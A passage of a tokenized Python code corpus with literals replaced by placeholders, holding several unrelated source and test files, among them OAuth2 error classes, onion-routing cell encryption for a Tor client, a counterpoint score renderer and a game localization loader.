    error = '<STR_LIT>'
    status_code = <NUM_LIT>


class UnauthorizedClientError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'
    status_code = <NUM_LIT>


class UnsupportedGrantTypeError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


class UnsupportedTokenTypeError(OAuth2Error):
    """<STR_LIT>"""
    error = '<STR_LIT>'


def raise_from_error(error, params=None):
    # Map an OAuth2 error code string onto the matching exception class
    # defined in this module and raise it with the response parameters.
    import inspect
    import sys
    kwargs = {
        '<STR_LIT:description>': params.get('<STR_LIT>'),
        '<STR_LIT>': params.get('<STR_LIT>'),
        '<STR_LIT:state>': params.get('<STR_LIT:state>')
    }
    for _, cls in inspect.getmembers(sys.modules[__name__], inspect.isclass):
        if cls.error == error:
            raise cls(**kwargs)
</s>
<s> from __future__ import absolute_import <EOL> from . facebook import facebook_compliance_fix <EOL> from . linkedin import linkedin_compliance_fix <EOL> from . weibo import weibo_compliance_fix </s>
<s>
'''<STR_LIT>'''
import hashlib
import hmac
import struct

from collections import namedtuple
from datetime import datetime
from itertools import izip

import OpenSSL

from Crypto.Cipher import AES
from Crypto.Util import asn1, Counter

from oppy.cell.cell import Cell
from oppy.cell.definitions import RECOGNIZED, EMPTY_DIGEST
from oppy.cell.fixedlen import EncryptedCell


class UnrecognizedCell(Exception):
    pass


# Per-hop cipher and running-digest state for one node on a circuit.
RelayCrypto = namedtuple("<STR_LIT>", ("<STR_LIT>",
                                       "<STR_LIT>",
                                       "<STR_LIT>",
                                       "<STR_LIT>"))


def constantStrEqual(str1, str2):
    '''<STR_LIT>'''
    # Prefer the stdlib constant-time comparison when it is available.
    try:
        from hmac import compare_digest
        return compare_digest(str1, str2)
    except ImportError:
        pass
    # Fallback: XOR-accumulate byte differences so the comparison takes
    # the same time regardless of where the inputs differ. When lengths
    # differ, compare str2 against itself to keep the loop length and
    # timing uniform while res=1 forces a non-equal result.
    if len(str1) != len(str2):
        res = <NUM_LIT:1>
        comp1 = bytearray(str2)
        comp2 = bytearray(str2)
    else:
        res = <NUM_LIT:0>
        comp1 = bytearray(str1)
        comp2 = bytearray(str2)
    for a, b in izip(comp1, comp2):
        res |= a ^ b
    return res == <NUM_LIT:0>


def constantStrAllZero(s):
    '''<STR_LIT>'''
    return constantStrEqual(s, '<STR_LIT:\x00>' * len(s))


def makeAES128CTRCipher(key, initial_value=<NUM_LIT:0>):
    '''<STR_LIT>'''
    ctr = Counter.new(<NUM_LIT>, initial_value=initial_value)
    return AES.new(key, AES.MODE_CTR, counter=ctr)


def makeHMACSHA256(msg, key):
    '''<STR_LIT>'''
    t = hmac.new(msg=msg, key=key, digestmod=hashlib.sha256)
    return t.digest()


def _makePayloadWithDigest(payload, digest=EMPTY_DIGEST):
    '''<STR_LIT>'''
    # The 4-byte running digest occupies payload bytes [5:9] of the
    # relay header; splice the given digest into that slot.
    assert len(payload) >= <NUM_LIT:9> and len(digest) == <NUM_LIT:4>
    DIGEST_START = <NUM_LIT:5>
    DIGEST_END = <NUM_LIT:9>
    return payload[:DIGEST_START] + digest + payload[DIGEST_END:]


def encryptCell(cell, crypt_path, early=False):
    '''<STR_LIT>'''
    assert cell.rheader.digest == EMPTY_DIGEST
    # Update the exit hop's forward digest over the payload (with an
    # empty digest field), then stamp its first 4 bytes into the header.
    crypt_path[-<NUM_LIT:1>].forward_digest.update(cell.getPayload())
    cell.rheader.digest = crypt_path[-<NUM_LIT:1>].forward_digest.digest()[:<NUM_LIT:4>]
    payload = cell.getPayload()
    # Onion-encrypt from the exit hop inward.
    for node in reversed(crypt_path):
        payload = node.forward_cipher.encrypt(payload)
    return EncryptedCell.make(cell.header.circ_id, payload, early=early)


def _cellRecognized(payload, relay_crypto):
    '''<STR_LIT>'''
    if len(payload) < <NUM_LIT:9> or payload[<NUM_LIT:2>:<NUM_LIT:4>] != RECOGNIZED:
        return False
    digest = payload[<NUM_LIT:5>:<NUM_LIT:9>]
    # Verify against a copy of the running digest so a miss does not
    # corrupt the real backward-digest state.
    test_payload = _makePayloadWithDigest(payload)
    test_digest = relay_crypto.backward_digest.copy()
    test_digest.update(test_payload)
    return test_digest.digest()[:<NUM_LIT:4>] == digest


def decryptCell(cell, crypt_path):
    '''<STR_LIT>'''
    origin = <NUM_LIT:0>
    recognized = False
    payload = cell.getPayload()
    # Peel one onion layer per hop until some hop recognizes the cell;
    # `origin` ends up as the index of the recognizing hop.
    for node in crypt_path:
        payload = node.backward_cipher.decrypt(payload)
        if _cellRecognized(payload, node):
            recognized = True
            break
        origin += <NUM_LIT:1>
    if not recognized:
        raise UnrecognizedCell()
    # Commit the recognizing hop's backward digest using the payload
    # with a zeroed digest field, matching how it was computed.
    updated_payload = _makePayloadWithDigest(payload)
    crypt_path[origin].backward_digest.update(updated_payload)
    # The circuit ID field width depends on the link protocol version.
    if cell.header.link_version < <NUM_LIT:4>:
        cid = struct.pack('<STR_LIT>', cell.header.circ_id)
    else:
        cid = struct.pack('<STR_LIT>', cell.header.circ_id)
    cmd = struct.pack('<STR_LIT>', cell.header.cmd)
    dec = Cell.parse(cid + cmd + payload)
    return (dec, origin)


def verifyCertSig(id_cert, cert_to_verify, algo='<STR_LIT>'):
    '''<STR_LIT>'''
    # Re-serialize the certificate to DER and split the outer SEQUENCE
    # into (tbsCertificate, signatureAlgorithm, signatureValue).
    cert_to_verify_ASN1 = OpenSSL.crypto.dump_certificate(
        OpenSSL.crypto.FILETYPE_ASN1, cert_to_verify)
    der = asn1.DerSequence()
    der.decode(cert_to_verify_ASN1)
    cert_to_verify_DER = der[<NUM_LIT:0>]
    cert_to_verify_ALGO = der[<NUM_LIT:1>]
    cert_to_verify_SIG = der[<NUM_LIT:2>]
    sig_DER = asn1.DerObject()
    sig_DER.decode(cert_to_verify_SIG)
    sig = sig_DER.payload
    # A BIT STRING payload must start with a zero "unused bits" octet.
    if sig[<NUM_LIT:0>] != '<STR_LIT:\x00>':
        return False
    sig = sig[<NUM_LIT:1>:]
    try:
        OpenSSL.crypto.verify(id_cert, sig, cert_to_verify_DER, algo)
        return True
    except OpenSSL.crypto.Error:
        return False


def validCertTime(cert):
    '''<STR_LIT>'''
    now = datetime.now()
    # NOTE(review): naive local time is compared against the ASN.1
    # validity timestamps — confirm the timestamps are local/UTC-consistent.
    try:
        validAfter = datetime.strptime(cert.get_notBefore(), '<STR_LIT>')
        validUntil = datetime.strptime(cert.get_notAfter(), '<STR_LIT>')
        return validAfter < now < validUntil
    except ValueError:
        return False
</s>
<s> import mock <EOL> from twisted . trial import unittest <EOL> from oppy . stream import stream <EOL> class StreamTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def setUp ( self , mock_dq , mock_er , mock_osp , mock_cm ) : <EOL> self . mock_er = mock_er <EOL> self . mock_osp = mock_osp <EOL> self . mock_cm = mock_cm <EOL> self . mock_dq = mock_dq <EOL> self . stream = stream . Stream ( self . mock_cm , self . mock_er , self . mock_osp ) <EOL> self . log_patch = mock . patch ( '<STR_LIT>' ) <EOL> self . mock_log = self . log_patch . start ( ) <EOL> def test_recv ( self ) : <EOL> self . stream . recv ( '<STR_LIT:test>' ) <EOL> self . stream . _read_queue . put . assert_called_once_with ( '<STR_LIT:test>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_send ( self , mock_crd ) : <EOL> self . stream . send ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . stream . _write_queue . put . call_count , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . stream . _write_queue . put . call_args_list , <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) ] ) <EOL> def test_incrementPackageWindow_normal ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _write_deferred = '<STR_LIT>' <EOL> self . stream . _package_window = <NUM_LIT:1> <EOL> self . stream . incrementPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <EOL> stream . STREAM_WINDOW_SIZE + <NUM_LIT:1> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:0> ) <EOL> def test_incrementPackageWindow_buffering ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _write_deferred = None <EOL> self . stream . 
_package_window = <NUM_LIT:0> <EOL> self . stream . incrementPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <EOL> stream . STREAM_WINDOW_SIZE ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_streamConnected ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . streamConnected ( ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_closeFromCircuit ( self ) : <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit_id = '<STR_LIT:test>' <EOL> self . stream . closeFromCircuit ( ) <EOL> self . assertEqual ( self . stream . socks . closeFromStream . call_count , <NUM_LIT:1> ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_closeFromSOCKS_no_circuit ( self ) : <EOL> self . stream . circuit = None <EOL> self . stream . closeFromSOCKS ( ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_closeFromSOCKS_circuit ( self ) : <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . removeStream = mock . Mock ( ) <EOL> self . stream . closeFromSOCKS ( ) <EOL> self . stream . circuit . removeStream . assert_called_once_with ( self . stream ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_registerNewStream_closed ( self ) : <EOL> mock_circuit = mock . Mock ( ) <EOL> mock_circuit . addStreamAndSetStreamID = mock . Mock ( ) <EOL> self . stream . _closed = True <EOL> self . stream . _registerNewStream ( mock_circuit ) <EOL> self . assertEqual ( mock_circuit . addStreamAndSetStreamID . call_count , <NUM_LIT:0> ) <EOL> def test_registerNewStream ( self ) : <EOL> mock_circuit = mock . Mock ( ) <EOL> mock_circuit . addStreamAndSetStreamID = mock . Mock ( ) <EOL> mock_circuit . beginStream = mock . Mock ( ) <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . 
_circuit_request = '<STR_LIT:test>' <EOL> self . stream . _registerNewStream ( mock_circuit ) <EOL> self . assertEqual ( self . stream . circuit , mock_circuit ) <EOL> self . assertEqual ( self . stream . _circuit_request , None ) <EOL> mock_circuit . addStreamAndSetStreamID . assert_called_once_with ( <EOL> self . stream ) <EOL> mock_circuit . beginStream . assert_called_once_with ( self . stream ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_pollWriteQueue ( self ) : <EOL> mock_wd = mock . Mock ( ) <EOL> mock_wd . addCallback = mock . Mock ( ) <EOL> self . stream . _write_queue . get . return_value = mock_wd <EOL> self . stream . _pollWriteQueue ( ) <EOL> self . assertEqual ( self . stream . _write_deferred , mock_wd ) <EOL> mock_wd . addCallback . assert_called_once_with ( self . stream . _writeData ) <EOL> def test_pollReadQueue ( self ) : <EOL> mock_rd = mock . Mock ( ) <EOL> mock_rd . addCallback = mock . Mock ( ) <EOL> self . stream . _read_queue . get . return_value = mock_rd <EOL> self . stream . _pollReadQueue ( ) <EOL> self . assertEqual ( self . stream . _read_deferred , mock_rd ) <EOL> mock_rd . addCallback . assert_called_once_with ( self . stream . _recvData ) <EOL> def test_writeData ( self ) : <EOL> self . stream . _decPackageWindow = mock . Mock ( ) <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . send = mock . Mock ( ) <EOL> self . stream . _writeData ( '<STR_LIT:test>' ) <EOL> self . stream . circuit . send . assert_called_once_with ( '<STR_LIT:test>' , self . stream ) <EOL> self . assertEqual ( self . stream . _decPackageWindow . call_count , <NUM_LIT:1> ) <EOL> def test_recvData ( self ) : <EOL> self . stream . _decDeliverWindow = mock . Mock ( ) <EOL> self . stream . _recvData ( '<STR_LIT:test>' ) <EOL> self . stream . socks . recv . assert_called_once_with ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . stream . _decDeliverWindow . 
call_count , <NUM_LIT:1> ) <EOL> def test_decDeliverWindow_above_threshold ( self ) : <EOL> self . stream . _deliver_window = <NUM_LIT> <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . _decDeliverWindow ( ) <EOL> self . assertEqual ( self . stream . _deliver_window , <NUM_LIT> ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_decDeliverWindow_at_threshold ( self ) : <EOL> self . stream . _deliver_window = <NUM_LIT> <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . sendStreamSendMe = mock . Mock ( ) <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . _decDeliverWindow ( ) <EOL> self . assertEqual ( self . stream . _deliver_window , <NUM_LIT> ) <EOL> self . stream . circuit . sendStreamSendMe . assert_called_once_with ( <EOL> self . stream ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_decPackageWindow_above_threshold ( self ) : <EOL> self . stream . _package_window = <NUM_LIT:2> <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _decPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_packageWindow_at_threshold ( self ) : <EOL> self . stream . _package_window = <NUM_LIT:1> <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _decPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . stream . _write_deferred , None ) <EOL> def test_chunkRelayData ( self ) : <EOL> data = '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN * <NUM_LIT:2> ) <EOL> data += '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN - <NUM_LIT:1> ) <EOL> ret = stream . 
_chunkRelayData ( data ) <EOL> self . assertEqual ( ret , <EOL> [ '<STR_LIT:\x00>' * stream . MAX_RPAYLOAD_LEN , '<STR_LIT:\x00>' * stream . MAX_RPAYLOAD_LEN , <EOL> '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN - <NUM_LIT:1> ) ] ) <EOL> def tearDown ( self ) : <EOL> self . log_patch . stop ( ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from string import Template <EOL> SPECIES_DURATION = { <EOL> <NUM_LIT:1> : <NUM_LIT:1> , <EOL> <NUM_LIT:2> : <NUM_LIT:2> , <EOL> <NUM_LIT:3> : <NUM_LIT:4> , <EOL> } <EOL> TEMPLATE = """<STR_LIT>""" <EOL> NOTES = { <EOL> <NUM_LIT:1> : "<STR_LIT:g>" , <EOL> <NUM_LIT:2> : "<STR_LIT:a>" , <EOL> <NUM_LIT:3> : "<STR_LIT:b>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT:r>" , <EOL> } <EOL> def get_cantus_firmus ( notes ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = NOTES [ normalised [ <NUM_LIT:0> ] ] + '<STR_LIT>' <EOL> result += '<STR_LIT:U+0020>' . join ( [ NOTES [ note ] for note in normalised [ <NUM_LIT:1> : ] ] ) <EOL> result += '<STR_LIT>' <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def get_simple_contrapunctus ( notes , duration ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = NOTES [ normalised [ <NUM_LIT:0> ] ] + '<STR_LIT>' % duration <EOL> result += '<STR_LIT:U+0020>' . join ( [ NOTES [ note ] for note in normalised [ <NUM_LIT:1> : - <NUM_LIT:2> ] ] ) <EOL> final_note = normalised . pop ( ) <EOL> penultimate_note = normalised . 
pop ( ) <EOL> next_note = NOTES [ penultimate_note ] <EOL> if final_note == penultimate_note + <NUM_LIT:1> : <EOL> if final_note not in [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> ] : <EOL> next_note = next_note [ <NUM_LIT:0> ] + '<STR_LIT>' + next_note [ <NUM_LIT:1> : ] <EOL> result += '<STR_LIT:U+0020>' + next_note <EOL> result += '<STR_LIT:U+0020>' + NOTES [ final_note ] <EOL> if duration != <NUM_LIT:1> : <EOL> result += '<STR_LIT>' <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def get_fourth_species ( notes ) : <EOL> """<STR_LIT>""" <EOL> result = '<STR_LIT>' <EOL> normalised = [ note for note in notes if note > <NUM_LIT:0> and note < <NUM_LIT> ] <EOL> if not normalised : <EOL> return result <EOL> result = '<STR_LIT>' <EOL> body = [ NOTES [ note ] for note in normalised [ : - <NUM_LIT:2> ] ] <EOL> for pitch in body : <EOL> result += '<STR_LIT>' % ( pitch , pitch ) <EOL> final_note = normalised . pop ( ) <EOL> penultimate_note = normalised . pop ( ) <EOL> next_note = NOTES [ penultimate_note ] <EOL> if final_note == penultimate_note + <NUM_LIT:1> : <EOL> if final_note not in [ <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> ] : <EOL> next_note = next_note [ <NUM_LIT:0> ] + '<STR_LIT>' + next_note [ <NUM_LIT:1> : ] <EOL> result += '<STR_LIT:U+0020>' + next_note <EOL> result += '<STR_LIT>' % ( NOTES [ final_note ] ) <EOL> result = result . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:U+0020>' ) <EOL> return result <EOL> def render ( species , cantus_firmus , contrapunctus , title = '<STR_LIT>' , <EOL> created_on = None , composer = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not created_on : <EOL> created_on = datetime . datetime . 
today ( ) <EOL> contrapunctus_notes = '<STR_LIT>' <EOL> if species < <NUM_LIT:4> : <EOL> duration = SPECIES_DURATION [ species ] <EOL> contrapunctus_notes = get_simple_contrapunctus ( contrapunctus , duration ) <EOL> elif species == <NUM_LIT:4> : <EOL> contrapunctus_notes = get_fourth_species ( contrapunctus ) <EOL> context = { } <EOL> context [ '<STR_LIT:title>' ] = title <EOL> context [ '<STR_LIT>' ] = created_on . strftime ( '<STR_LIT>' ) <EOL> context [ '<STR_LIT>' ] = composer <EOL> context [ '<STR_LIT>' ] = contrapunctus_notes <EOL> context [ '<STR_LIT>' ] = get_cantus_firmus ( cantus_firmus ) <EOL> if context [ '<STR_LIT>' ] and context [ '<STR_LIT>' ] : <EOL> score = Template ( TEMPLATE ) <EOL> return score . substitute ( context ) <EOL> else : <EOL> return '<STR_LIT>' </s>
<s> from . version import get_version <EOL> __version__ = get_version ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import cPickle <EOL> import gc <EOL> debug = False <EOL> class BasePropertyHandler ( object ) : <EOL> __id__ = <NUM_LIT:10> <EOL> def __init__ ( self , localizationInstance , cfgInstance ) : <EOL> self . cfg = cfgInstance <EOL> self . localization = localizationInstance <EOL> def default ( self , value , languageID , ** kwargs ) : <EOL> return value <EOL> class MessageIDPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:5> <EOL> def default ( self , value , languageID , ** kwargs ) : <EOL> return self . localization . GetByMessageID ( value , languageID ) <EOL> class LocationPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:3> <EOL> def name ( self , locationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . evelocations . Get ( locationID ) . locationName or '<STR_LIT:None>' <EOL> def rawName ( self , locationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . evelocations . Get ( locationID ) . GetRawName ( languageID ) <EOL> class ItemPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:2> <EOL> def name ( self , itemID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . invtypes . Get ( itemID ) . typeName or '<STR_LIT:None>' <EOL> def rawName ( self , itemID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . invtypes . Get ( itemID ) . GetRawName ( languageID ) <EOL> class NpcOrganizationPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:1> <EOL> def name ( self , npcOrganizationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . eveowners . Get ( npcOrganizationID ) . name <EOL> def rawName ( self , npcOrganizationID , languageID , * args , ** kwargs ) : <EOL> return self . cfg . eveowners . Get ( npcOrganizationID ) . 
GetRawName ( languageID ) <EOL> class NumericPropertyHandler ( BasePropertyHandler ) : <EOL> __id__ = <NUM_LIT:9> <EOL> class Localization ( object ) : <EOL> def __init__ ( self , eve , languageID = "<STR_LIT>" , cfgInstance = None ) : <EOL> self . cfg = cfgInstance or cfg <EOL> self . _propertyHandlers = { } <EOL> for cls in globals ( ) . itervalues ( ) : <EOL> if isinstance ( cls , type ) and issubclass ( cls , BasePropertyHandler ) : <EOL> self . _propertyHandlers [ cls . __id__ ] = cls ( self , cfgInstance ) <EOL> res = eve . ResFile ( ) <EOL> def _loadlanguage ( languageID ) : <EOL> x , data = cPickle . loads ( res . Open ( "<STR_LIT>" % languageID ) . read ( ) ) <EOL> data . update ( cPickle . loads ( res . Open ( "<STR_LIT>" % languageID ) . read ( ) ) [ <NUM_LIT:1> ] ) <EOL> return data <EOL> self . languageID = languageID <EOL> self . primary = _loadlanguage ( languageID ) <EOL> if languageID != "<STR_LIT>" : <EOL> self . fallback = _loadlanguage ( "<STR_LIT>" ) <EOL> else : <EOL> self . fallback = None <EOL> self . languageLabels = { } <EOL> for resname in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) : <EOL> unPickledObject = cPickle . loads ( res . Open ( resname ) . read ( ) ) <EOL> for messageID , dataRow in unPickledObject [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fp = dataRow [ '<STR_LIT>' ] <EOL> label = fp + '<STR_LIT:/>' + dataRow [ '<STR_LIT:label>' ] if fp else dataRow [ '<STR_LIT:label>' ] <EOL> self . languageLabels [ label . encode ( '<STR_LIT:ascii>' ) ] = messageID <EOL> del unPickledObject <EOL> gc . collect ( ) <EOL> def _format ( self , fmt , param , languageID ) : <EOL> raw , noclue , tokens = fmt <EOL> try : <EOL> for token , data in tokens . iteritems ( ) : <EOL> handler = self . _propertyHandlers [ data [ '<STR_LIT>' ] ] <EOL> getter = getattr ( handler , data [ '<STR_LIT>' ] or "<STR_LIT:default>" ) <EOL> replacement = getter ( param [ data [ '<STR_LIT>' ] ] , languageID , ** data [ '<STR_LIT>' ] ) <EOL> raw = raw . 
replace ( token , unicode ( replacement ) ) <EOL> except KeyError : <EOL> if debug : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , token <EOL> print "<STR_LIT>" , data <EOL> print "<STR_LIT>" , param <EOL> print "<STR_LIT>" , raw <EOL> raise <EOL> return raw <EOL> def GetByMessageID ( self , messageID , languageID = None , ** kwarg ) : <EOL> if messageID is None : <EOL> return "<STR_LIT>" <EOL> tr = self . primary . get ( messageID , False ) <EOL> if tr == False and self . fallback : <EOL> tr = self . fallback . get ( messageID ) <EOL> if tr : <EOL> if kwarg or tr [ <NUM_LIT:2> ] : <EOL> return self . _format ( tr , kwarg , languageID ) <EOL> return tr [ <NUM_LIT:0> ] <EOL> return "<STR_LIT>" % ( messageID , kwarg ) <EOL> def GetByLabel ( self , label , languageID = None , ** kwarg ) : <EOL> try : <EOL> messageID = self . languageLabels [ label ] <EOL> except KeyError : <EOL> return '<STR_LIT>' % label <EOL> return self . GetByMessageID ( messageID , languageID , ** kwarg ) <EOL> GetImportantByMessageID = GetByMessageID <EOL> GetImportantByLabel = GetByLabel </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from numpy . testing import assert_array_equal <EOL> from sklearn import datasets <EOL> from sklearn . cross_validation import train_test_split <EOL> from sklearn . svm import SVC <EOL> from libact . base . dataset import Dataset <EOL> from libact . models import SVM <EOL> class SVMIrisTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> iris = datasets . load_iris ( ) <EOL> X = iris . data <EOL> y = iris . target <EOL> self . X_train , self . X_test , self . y_train , self . y_test = train_test_split ( X , y , test_size = <NUM_LIT> , random_state = <NUM_LIT> ) <EOL> def test_SVM ( self ) : <EOL> svc_clf = SVC ( ) <EOL> svc_clf . fit ( self . X_train , self . y_train ) <EOL> svm = SVM ( ) <EOL> svm . train ( Dataset ( self . X_train , self . y_train ) ) <EOL> assert_array_equal ( <EOL> svc_clf . predict ( self . X_train ) , svm . predict ( self . X_train ) ) <EOL> assert_array_equal ( <EOL> svc_clf . predict ( self . X_test ) , svm . predict ( self . X_test ) ) <EOL> self . assertEqual ( <EOL> svc_clf . score ( self . X_train , self . y_train ) , <EOL> svm . score ( Dataset ( self . X_train , self . y_train ) ) ) <EOL> self . assertEqual ( <EOL> svc_clf . score ( self . X_test , self . y_test ) , <EOL> svm . score ( Dataset ( self . X_test , self . y_test ) ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from contextlib import contextmanager <EOL> from atom . api import Atom , Bool , Str , Tuple , Typed , ForwardTyped <EOL> from atom . datastructures . api import sortedmap <EOL> from . expression_engine import ExpressionEngine <EOL> __stack = [ ] <EOL> __map = { } <EOL> @ contextmanager <EOL> def new_scope ( key , seed = None ) : <EOL> """<STR_LIT>""" <EOL> if seed is not None : <EOL> scope = seed . copy ( ) <EOL> else : <EOL> scope = sortedmap ( ) <EOL> __map [ key ] = scope <EOL> __stack . append ( scope ) <EOL> yield scope <EOL> __stack . pop ( ) <EOL> del __map [ key ] <EOL> def peek_scope ( ) : <EOL> """<STR_LIT>""" <EOL> return __stack [ - <NUM_LIT:1> ] <EOL> def fetch_scope ( key ) : <EOL> """<STR_LIT>""" <EOL> return __map [ key ] <EOL> class CompilerNode ( Atom ) : <EOL> """<STR_LIT>""" <EOL> scope_key = Typed ( object ) <EOL> children = Typed ( list , ( ) ) <EOL> id_nodes = Typed ( sortedmap ) <EOL> def update_id_nodes ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> self . id_nodes = mapping <EOL> for child in self . children : <EOL> child . update_id_nodes ( mapping ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> node = type ( self ) ( ) <EOL> node . scope_key = self . scope_key <EOL> node . children = [ child . copy ( ) for child in self . children ] <EOL> return node <EOL> class DeclarativeNode ( CompilerNode ) : <EOL> """<STR_LIT>""" <EOL> klass = Typed ( type ) <EOL> identifier = Str ( ) <EOL> store_locals = Bool ( False ) <EOL> child_intercept = Bool ( False ) <EOL> engine = Typed ( ExpressionEngine ) <EOL> closure_keys = Typed ( set ) <EOL> super_node = ForwardTyped ( lambda : EnamlDefNode ) <EOL> def __call__ ( self , parent ) : <EOL> """<STR_LIT>""" <EOL> klass = self . klass <EOL> instance = klass . __new__ ( klass ) <EOL> self . populate ( instance ) <EOL> instance . __init__ ( parent ) <EOL> return instance <EOL> def populate ( self , instance ) : <EOL> """<STR_LIT>""" <EOL> if self . super_node is not None : <EOL> self . 
